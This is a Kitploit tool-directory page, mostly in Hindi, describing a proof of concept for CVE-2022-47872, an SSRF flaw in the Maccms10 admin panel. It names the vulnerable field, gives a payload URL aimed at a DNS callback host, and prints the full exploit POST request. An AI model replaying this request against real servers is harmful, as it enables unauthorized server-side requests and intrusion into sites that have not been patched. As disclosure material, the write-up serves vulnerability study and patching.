Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-47872 — Maccms10 व्यवस्थापक पैनल में SSRF भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट, HTTP अनुरोध विवरण के साथ कस्टम इंटरफ़ेस संग्रह के माध्यम से शोषण का प्रदर्शन। | Kitploit
उपकरण/GitHubGitHub/cedric1314/cve-2022-47872
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubcedric1314/cve-2022-47872

CVE-2022-47872

Maccms10 व्यवस्थापक पैनल में SSRF भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट, HTTP अनुरोध विवरण के साथ कस्टम इंटरफ़ेस संग्रह के माध्यम से शोषण का प्रदर्शन।

रिपॉजिटरी देखें
3 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

#CVE-2022-47872

maccms10 admin+ ssrf attacks

अवलोकन

निर्माता की वेबसाइट जानकारी:https://maccms.pro

स्रोत कोड डाउनलोड पता : https://github.com/maccmspro/maccms10.git

प्रभावित संस्करण: V2021.1000.2000

图片

2.भेद्यता विवरण

https://github.com/maccmspro/maccms10/issues/22

बैकग्राउंड में जाएं, Collect पर क्लिक करें --> Custom interface --> Interface address,

नाम बॉक्स में payload1 डालें:http://7ca8e96e.dns.1433.eu.org.

यह ssrf हमले का कारण बन सकता है।

भेद्यता का नाम:ssrf हमले

भेद्यता स्तर:मध्यम जोखिम

भेद्यता स्थान:Collect पर क्लिक करें --> Custom interface --> Interface address

3.पुनरावृत्त भेद्यताएं और

POST http://192.168.52.163/admin.php/admin/collect/info.html HTTP/1.1

Host: 192.168.52.163

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0

Accept: /

AcceptLanguage: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding:gzip,deflate

Content-Type: applicat ion/ x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 226

Origin: http://192.168.52.163

Connection: close

Referer: http://192.168.52.163/admin.php/admin/collect/info.html

Cookie: PHPSESSID=gn328q2i2ruajsh96qoll65ia7

collect_id=&token=8d639020c85bde89f9276381d2460046&collect_name=1111&collect_url=http%3A%2F%2F7ca8e96e.dns.1433.eu.org.&collect_param=%26q%3D1&collect_type=1&collect_mid=1&collect_opt=Ø&collect_filter=0&collect_filter_from=

图片

图片

图片

图片

图片

टूल डाउनलोड करें